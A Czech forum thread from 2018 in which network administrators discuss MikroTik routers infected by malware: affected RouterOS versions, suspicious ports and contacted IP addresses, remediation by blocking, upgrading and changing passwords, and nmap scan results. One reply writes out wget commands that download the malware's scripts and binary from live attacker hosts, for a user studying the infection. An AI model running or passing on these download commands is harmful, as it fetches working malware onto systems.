MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

Návody a problémy s konfigurací.
vencakubik
Příspěvky: 45
Registrován: 11 years ago
Kontaktovat uživatele:

Re: MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

Příspěvekod vencakubik » 4 months ago

Abych odpověděl trochu na otázky, sorry za zdržení, řešil jsem ty napadené MK a hledal další napadené v síti.
K verzím, našel jsem to na verzi 6.30.4; 6.34.4; 6.42.1; 6.42.2 i na 5.26
V ip/services
zakázané api, api-ssl, ftp, telnet, ssh port změněn na 2222, www port 8080, winbox 8291. Bohužel bez omezení na IP rozsah nebo konkrétní IP.
Users standard admin, silné heslo, ale omezení na vstup pouze z IP rozsahu vnitřní sítě!
V ip/firewall zakázaný pouze tcp/25 a udp/53 input.
Teď k tomu že si myslím že po upgradu už tam "vir" není. Než jsem zařízení rebootnul, oskenoval jsem si jeho otevřené porty, měl otevřený port 3553, který není zase tak typický. Při pozorování přes torch se neustále snažil komunikovat s IP adresou: 93.99.117.15 a 103.1.221.167, zkoušel si osahat porty 22,23,53,80,81,82,8080,8081,8082,8880,8888, pak otevíral telnet právě na tyto dvě IP adresy. Jedna je česká, takže můj úsudek že druhá strana je také "zavirovaná" a posílají "něco". Druhá IP už zrovna česká není.
Postupoval jsem tak, že jsem obě dvě IP zakázal před napadeným MK, komunikace utichla, změnil jsem DNS a upgradnul na poslední verzi 6.42.5, ihned po rebootu jsem upgradnul i firmware desky. Po naněhnutí jsem zkontroloval partition size, zda-li souhlasí s hardwarovou velikostí desky.
Pak sken otevřených portů, 3553 zavřený a i když jsem povolil zpět ty dvě IP adresy, už s nimi nekomunikoval.

A ještě doporučím, kdo měl nějakého napadeného MK, určitě změňte hesla v celé síti! U prvních MK co jsem našel že jsou zavirovaný jsem v logu našel spusty zkoušení hesel na ssh až to najednou vyšlo, ale dnes co jsem našel MK další, už žádné zkoušení nebylo, připojil se tam na první dobrou.
Naposledy upravil(a) vencakubik dne 09 Jul 2018 20:59, celkem upraveno 1 x.
3 x

Uživatelský avatar
Myghael
Příspěvky: 1193
Registrován: 7 years ago

Příspěvekod Myghael » 4 months ago

Díky za příspěvek. Každopádně minimálně jedna z těch zranitelností se týkala právě web rozhraní, které jsi měl zapnuté, podle mého tedy pravděpodobný vektor útoku, byl-li zdroj nákazy uvnitř tvé sítě. Ochranu proti spoofingu na síti máš?
0 x
Si vis pacem, para bellum.

MikroTik, UBNT, Cisco, TP-Link... rozhoduje vhodnost toho či onoho pro konkrétní použití, ne jaké logo nalepili v Číně na krabici. Na tomto fóru vystupuji jen a pouze sám za sebe.

the.max
Příspěvky: 1101
Registrován: 11 years ago
Bydliště: Sudetten land
Kontaktovat uživatele:

Příspěvekod the.max » 4 months ago

Dobrej popis postupu. Jen by mě zjaímalo, kde je vidět velikost pártišen.
0 x
Vysoce odborných omylů se dopouští jen specialisté.

Jednou jsem se dotkl ukazováčkem UBNT a slezl mi z něho nehet. Od té doby na UBNT nesahám.

TheITman
Příspěvky: 122
Registrován: 2 years ago

Příspěvekod TheITman » 4 months ago

Pánové bylo by možné dodat všechny soubory viru ne pouze scripot? chybí mi soubor o.sh , zxcvbnm.txt a winbox.idx o kterých vyplývá že se natáhnou se skriptem to samé stop.txt vše by mnělo být v adresáři /tmp za příapdné reakce bduu vděčný, mým cílem je pochopit jak tady ta zas*aná věc funguje :) Díky
1 x

Dalibor Toman
Příspěvky: 1198
Registrován: 6 years ago

Příspěvekod Dalibor Toman » 4 months ago

TheITman píše:Pánové bylo by možné dodat všechny soubory viru ne pouze scripot? chybí mi soubor o.sh , zxcvbnm.txt a winbox.idx o kterých vyplývá že se natáhnou se skriptem to samé stop.txt vše by mnělo být v adresáři /tmp za příapdné reakce bduu vděčný, mým cílem je pochopit jak tady ta zas*aná věc funguje :) Díky


wget http://141.105.64.212/36/a.sh -O a.sh
wget http://141.105.64.212/36/b.php -O update.sh
wget -T 20 http://vn8d2x8q.com/pic/3.jpg -O zxcvbnm

v teto chvili jde vsechno stahnout

zxcvbnm je binarka. Tak hodne stesti

winbox.idx je soubor ktery vetsinou existue a obsahuj casto seznam DLLek (uz obsolete). Skripty ho mazou ale nevytvareji.
1 x

TheITman
Příspěvky: 122
Registrován: 2 years ago

Příspěvekod TheITman » 4 months ago

[quote="Dalibor Toman"]
Děkuji za odpověď, tyto soubory mám stažené, nicméně ve scriptu a.sh je na řádkuč.2 vymaž o.sh jenže tento soubor jsem neviděl nikde ve scriptu vytvořit či stáhnout. proto mně tento soubor zajímá stejně jako soubor stop.txt
0 x

Uživatelský avatar
mac0112
Příspěvky: 345
Registrován: 8 years ago
antispam: Ano
Bydliště: Klecany
Kontaktovat uživatele:

Příspěvekod mac0112 » 4 months ago

Pomůže, když SSH a Winbox bude přístupné pouze z určité adresy nebo je to jedno ?
0 x

mpcz
Příspěvky: 2250
Registrován: 12 years ago

Příspěvekod mpcz » 4 months ago

No je to samozřejmě malá bariéra navíc, kterou lze ale také obejít. Každopádně neuškodí.


Stále se to tady točí dokolečka, zajímavé informace přibývají. Bohužel zásadní otázky stále nemají odpovědi. Myslím např. tyto:
1/ Nová instalace s poslední verzí ROS 6.42.5, popř. s IP services pouze na změněný winbox - zavirovalo se to už někomu, popř. jak?
2/ Umíme detekovat zavirovaný stroj?, popř. jak. To je zásadní otázka. Získat přístup k souborům linuxu a ROSu není žádný problém, takže by to nemuselo být tak složité (pro toho, kdo se tím živí), např. pro tvůrce ROS. Možná je dost takových, kteří spokojeně upgradují ROS na "bezpečnou" verzi a přitom mají již delší dobu v ROSu zadní vrátka.
3/ Jak zkontrolovat velikost a počet partition při podezření na usídlení viru?
4/ Dovede si upgrade ROS poradit se zavirovaným strojem a vir zlikviduje?
5/ Je nebezpečí, že při upgrade zavirovaného stroje na "bezpečnou" verzi dojde k blokaci stroje?
6/ Lze se dostat do zavirovaného a zamklého stroje, popř jak?
atd. ... mpcz, 11.jul.2018
4 x

Dalibor Toman
Příspěvky: 1198
Registrován: 6 years ago

Příspěvekod Dalibor Toman » 4 months ago

mpcz píše:5/ Je nebezpečí, že při upgrade zavirovaného stroje na "bezpečnou" verzi dojde k blokaci stroje?


zazil jsem pri upgrade RB433 z 6.36 na 6.40.8, ze po rebootu byla aktivni defaultni CFG jako na novem kusu.
0 x

mpcz
Příspěvky: 2250
Registrován: 12 years ago

Příspěvekod mpcz » 4 months ago

Zdravím, na některých strojích mikrotik jsem narazil na otevřené porty 8266 a 7252. Nejsem si vědom manipulace s nimi. K čemu by mohly sloužit? Ví někdo? Děkuji, 13.07.2018
0 x

Uživatelský avatar
Myghael
Příspěvky: 1193
Registrován: 7 years ago

Příspěvekod Myghael » 4 months ago

Tyhle porty ne, zkoušel jsi je skenovat, co na nich běží? Případně kdyby bylo možno "zveřejkovat", rád bych se na to mrkl.
0 x
Si vis pacem, para bellum.

MikroTik, UBNT, Cisco, TP-Link... rozhoduje vhodnost toho či onoho pro konkrétní použití, ne jaké logo nalepili v Číně na krabici. Na tomto fóru vystupuji jen a pouze sám za sebe.

mpcz
Příspěvky: 2250
Registrován: 12 years ago

Příspěvekod mpcz » 4 months ago

Zkusil jsem port 8266 oskenovat na různých strojích a skoro všude byl otevřený/filtered. Může to prosím někdo zkusit taky? Děkuji. mpcz, 14.7.2018
0 x

the.max
Příspěvky: 1101
Registrován: 11 years ago
Bydliště: Sudetten land
Kontaktovat uživatele:

Příspěvekod the.max » 4 months ago

ať zkouším skenovat cokoli mě napadne doma, na síti nebo i venku v netu, tak výsledek je takovej:

Kód: Vybrat vše

themax@bobika / $ nmap aaa.bbb.ccc.ddd -p8266
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-14 21:55 CEST
Nmap scan report for aaa.bbb.ccc.ddd
Host is up (0.012s latency).

PORT     STATE  SERVICE
8266/tcp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
themax@bobika / $
0 x
Vysoce odborných omylů se dopouští jen specialisté.

Jednou jsem se dotkl ukazováčkem UBNT a slezl mi z něho nehet. Od té doby na UBNT nesahám.

mpcz
Příspěvky: 2250
Registrován: 12 years ago

Příspěvekod mpcz » 4 months ago

1/
Starting Nmap 7.70 at 2018-07-14 21:18 Střední Evropa (letní čas)
Nmap scan report for xxxxxxx.xxxxx.net (178.238.xx.xx)
Host is up (0.055s latency).
PORT STATE SERVICE
8266/tcp filtered unknown

2/
Starting Nmap 7.70 at 2018-07-14 22:53 Střední Evropa (letní čas)
Nmap scan report for 29-195-xxx-xx-cust.xxxxxxx.cz
Host is up (0.026s latency).
PORT STATE SERVICE
8266/tcp filtered unknown
mpcz, 14.7.2018
0 x

the.max
Příspěvky: 1101
Registrován: 11 years ago
Bydliště: Sudetten land
Kontaktovat uživatele:

Příspěvekod the.max » 4 months ago

To spíš vypadá, jako by někde po cestě od tebe byl ten port ve firewallu filtrovanej.
0 x
Vysoce odborných omylů se dopouští jen specialisté.

Jednou jsem se dotkl ukazováčkem UBNT a slezl mi z něho nehet. Od té doby na UBNT nesahám.


Zpět na „Konfigurace“

Kdo je online

Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 12 hostů